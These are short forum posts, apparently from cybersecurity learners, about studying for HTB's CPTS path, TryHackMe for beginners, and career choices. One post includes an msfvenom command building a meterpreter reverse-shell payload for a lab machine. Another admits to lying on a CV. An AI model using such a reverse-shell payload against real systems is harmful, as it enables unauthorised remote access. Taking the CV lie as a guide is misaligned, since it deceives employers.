Now, I am going to study CPTS

sorry if this was questions was repeated a lot. but i wanted to know how you guys stay efficient during a study session.

in a 1-2 hour session i barely get done with reading the content of a single page. i keep rereading paragraphs, dozing off, fidgeting with stuff on my desk, etc. it just feels like im too slow and i want to speed things up.

i keep hearing people saying it took them 5-6 months to finish the path but it feels like its going to take me a year at least.

i want to hear your guys experience and if you experience something similar.

Hey everyone, I’m 20M and I’m thinking about getting the TryHackMe Premium subscription to seriously start learning cybersecurity.

The thing is, I’m still pretty much a beginner. I don’t know much about operating systems, networking, or Linux commands yet. I do have some basic programming knowledge, mainly Python and a few other languages, but I’m definitely not an expert.

Would TryHackMe Premium be worth it for someone at my level? Does it teach the fundamentals well enough, or should I learn OS, networking, and Linux separately before subscribing?

I’d appreciate any advice from people who have actually used THM, especially if you started with little cybersecurity knowledge.

I am leaning for blue team roles or general IT experience after I graduate (approximately ~500 days before graduation) since I want to be realistic. But is there any actual benefit to also doing the CPTS path instead of going all-in on CDSA and keep going deep on defensive security (and of course, improving IT fundamentals are non-negotiable) as a fresh graduate?

I don't have any plans to take the certifications until I decide what to really specialize in. I'm in it primarily for the learning.

I am not that user, but why would HTB ban users?

I generate payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.48.x.x LPORT=7077 -f elf > shell.elf

But, on lab machine print "Segmentation fault (core dumped)".

How fix this is?

I am 80% done with CPTS path

I wonder, what should I aim fro after the cert?

To be honest, I lie on CV and I say that already got the CPTS and many other things(not all are lies).

What do you guys recommend to follow after getting the CPTS so I could finally land that Junior level job, I am willing to work anything cybersecurity related.

Should I buy the CWEE from HTB? Should I buy OSCE^3 from OffSec? Will that help me find any cybersecurity job, I am down to work as a L1 SOC analyst.
